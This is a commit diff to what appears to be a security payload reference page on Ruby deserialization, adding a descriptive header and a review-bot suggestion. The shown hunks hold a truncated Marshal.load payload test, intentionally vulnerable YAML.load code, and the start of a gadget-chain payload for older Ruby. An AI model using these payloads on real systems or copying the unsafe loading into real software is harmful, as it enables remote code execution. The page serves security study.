Normalize page header for GraphQL, Deserialization, SCM

Swissky
2024-11-10 14:37:48 +01:00
parent 2deb20a6f1
commit 2304101657
21 changed files with 262 additions and 129 deletions


@@ -1,5 +1,8 @@
# Ruby Deserialization
> Ruby deserialization is the process of converting serialized data back into Ruby objects, often using formats like YAML, Marshal, or JSON. Ruby's Marshal module, for instance, is commonly used for this, as it can serialize and deserialize complex Ruby objects.
## Summary
* [Marshal.load](#marshalload)
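Review bot: the new description blockquote under `# Ruby Deserialization` defines what deserialization is but never states the risk this page documents. Suggest ending it with a clause saying that passing untrusted input to `Marshal.load` or `YAML.load` can instantiate arbitrary objects, so the header explains why the page exists. The same line lists JSON beside YAML and Marshal with no distinction between them; either drop it or say how it differs from the other two.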
@@ -18,12 +21,14 @@ for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1
## Yaml.load
Vulnerable code
```ruby
require "yaml"
YAML.load(File.read("p.yml"))
```
Universal gadget for ruby <= 2.7.2:
```ruby
--- !ruby/object:Gem::Requirement
requirements: